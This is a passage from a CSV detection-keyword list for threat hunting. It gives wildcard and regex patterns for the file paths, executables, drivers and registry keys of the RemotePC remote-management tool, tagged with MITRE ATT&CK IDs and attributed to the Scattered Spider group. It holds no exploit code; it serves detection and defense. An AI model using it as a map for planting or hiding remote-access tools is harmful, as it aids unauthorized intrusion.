T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RPCFireWallRule.exe*",".{0,1000}\/RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - 
T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rpcperfviewer.exe*",".{0,1000}\/rpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RPCProxyLatency.exe*",".{0,1000}\/RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/viewerhostkeypopup.exe*",".{0,1000}\/viewerhostkeypopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AttendedServiceRemove.exe*",".{0,1000}\\AttendedServiceRemove\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AttendedUDP.zip*",".{0,1000}\\AttendedUDP\.zip.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\BSUtility.exe*",".{0,1000}\\BSUtility\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Control\Print\Monitors\REMOTEPCPRINTER*",".{0,1000}\\Control\\Print\\Monitors\\REMOTEPCPRINTER.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\App Paths\RemotePCPerformance*",".{0,1000}\\CurrentVersion\\App\sPaths\\RemotePCPerformance.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Devices\RemotePC Printer*",".{0,1000}\\CurrentVersion\\Devices\\RemotePC\sPrinter.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\InventoryApplicationFile\rpcattendedadmin*",".{0,1000}\\InventoryApplicationFile\\rpcattendedadmin.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Print\Printers\RemotePC Printer\*",".{0,1000}\\Print\\Printers\\RemotePC\sPrinter\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Program Files 
(x86)\RemotePC\*",".{0,1000}\\Program\sFiles\s\(x86\)\\RemotePC\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\program files (x86)\remotepc\remotepcperformance\*",".{0,1000}\\program\sfiles\s\(x86\)\\remotepc\\remotepcperformance\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\RemotePC*",".{0,1000}\\ProgramData\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC (1).exe*",".{0,1000}\\RemotePC\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC Attended.lnk*",".{0,1000}\\RemotePC\sAttended\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC Attended\*",".{0,1000}\\RemotePC\sAttended\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC Performance 
Host\*",".{0,1000}\\RemotePC\sPerformance\sHost\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.Common.dll*",".{0,1000}\\RemotePC\.Common\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.Common.dll*",".{0,1000}\\RemotePC\.Common\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.exe*",".{0,1000}\\RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.exe*",".{0,1000}\\RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.lnk*",".{0,1000}\\RemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.tmp*",".{0,1000}\\RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC.tmp*",".{0,1000}\\RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePC\*.dll*",".{0,1000}\\RemotePC\\.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCAttended.dmg*",".{0,1000}\\RemotePCAttended\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCCopyPaste.txt*",".{0,1000}\\RemotePCCopyPaste\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDDriver.cat*",".{0,1000}\\RemotePCDDriver\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDDriver.inf*",".{0,1000}\\RemotePCDDriver\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RemotePCDDriver.inf*",".{0,1000}\\RemotePCDDriver\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDDriverumode1_0.dll*",".{0,1000}\\RemotePCDDriverumode1_0\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDDriverumode1_2.dll*",".{0,1000}\\RemotePCDDriverumode1_2\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDesktop.txt*",".{0,1000}\\RemotePCDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDnD.dll*",".{0,1000}\\RemotePCDnD\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCDnDLauncher.exe*",".{0,1000}\\RemotePCDnDLauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCHDDesktop.txt*",".{0,1000}\\RemotePCHDDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration 
tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCHDService.txt*",".{0,1000}\\RemotePCHDService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remotepclauncher.exe*",".{0,1000}\\remotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCModules.log*",".{0,1000}\\RemotePCModules\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPDF.conf*",".{0,1000}\\RemotePCPDF\.conf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPDF.conf*",".{0,1000}\\RemotePCPDF\.conf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPerformancePlugins.exe*",".{0,1000}\\RemotePCPerformancePlugins\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinter.exe*",".{0,1000}\\RemotePCPrinter\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinter.exe*",".{0,1000}\\RemotePCPrinter\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinter.exe.config*",".{0,1000}\\RemotePCPrinter\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinter.pdb*",".{0,1000}\\RemotePCPrinter\.pdb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinterCore.dll*",".{0,1000}\\RemotePCPrinterCore\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPrinterCore.pdb*",".{0,1000}\\RemotePCPrinterCore\.pdb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RemotePCProxys.dat*",".{0,1000}\\RemotePCProxys\.dat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPS5UI.DLL*",".{0,1000}\\RemotePCPS5UI\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPS5UI.DLL*",".{0,1000}\\RemotePCPS5UI\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPSCRIPT.*",".{0,1000}\\RemotePCPSCRIPT\..{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPSCRIPT.HLP*",".{0,1000}\\RemotePCPSCRIPT\.HLP.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPSCRIPT.NTF*",".{0,1000}\\RemotePCPSCRIPT\.NTF.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCPSCRIPT5.DLL*",".{0,1000}\\RemotePCPSCRIPT5\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCService.exe*",".{0,1000}\\RemotePCService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCService.txt*",".{0,1000}\\RemotePCService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCService_2.txt*",".{0,1000}\\RemotePCService_2\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCSuite.dmg*",".{0,1000}\\RemotePCSuite\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDE.cat*",".{0,1000}\\RemotePCUDE\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDE.inf*",".{0,1000}\\RemotePCUDE\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RemotePCUDE.sys*",".{0,1000}\\RemotePCUDE\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDE.sys*",".{0,1000}\\RemotePCUDE\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDEHost.cat*",".{0,1000}\\RemotePCUDEHost\.cat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDEHost.inf*",".{0,1000}\\RemotePCUDEHost\.inf.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUDEHost.sys*",".{0,1000}\\RemotePCUDEHost\.sys.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUIA.exe*",".{0,1000}\\RemotePCUIA\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCUIU.exe*",".{0,1000}\\RemotePCUIU\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remotepcuiu.exe*",".{0,1000}\\remotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemotePCViewer.msi*",".{0,1000}\\RemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcAccessPermissionNotifier.exe*",".{0,1000}\\RpcAccessPermissionNotifier\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcAccessPermissionNotifier.exe*",".{0,1000}\\RpcAccessPermissionNotifier\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcApp\RPCCodecEngine.exe*",".{0,1000}\\RpcApp\\RPCCodecEngine\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcApp\Tools\Chat.exe*",".{0,1000}\\RpcApp\\Tools\\Chat\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcApp\Tools\Chat.exe*",".{0,1000}\\RpcApp\\Tools\\Chat\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcApp\Tools\TransferServer.exe*",".{0,1000}\\RpcApp\\Tools\\TransferServer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCAppLauncherLogFile.txt*",".{0,1000}\\RPCAppLauncherLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCAttended.log*",".{0,1000}\\RPCAttended\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCAttendedAdmin.exe*",".{0,1000}\\RPCAttendedAdmin\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCCertificate.log*",".{0,1000}\\RPCCertificate\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RPCCertificate.log*",".{0,1000}\\RPCCertificate\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCClipboard.exe*",".{0,1000}\\RPCClipboard\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCClipboardAttended.exe*",".{0,1000}\\RPCClipboardAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCConfig.ini*",".{0,1000}\\RPCConfig\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCCoreViewer.exe*",".{0,1000}\\RPCCoreViewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration 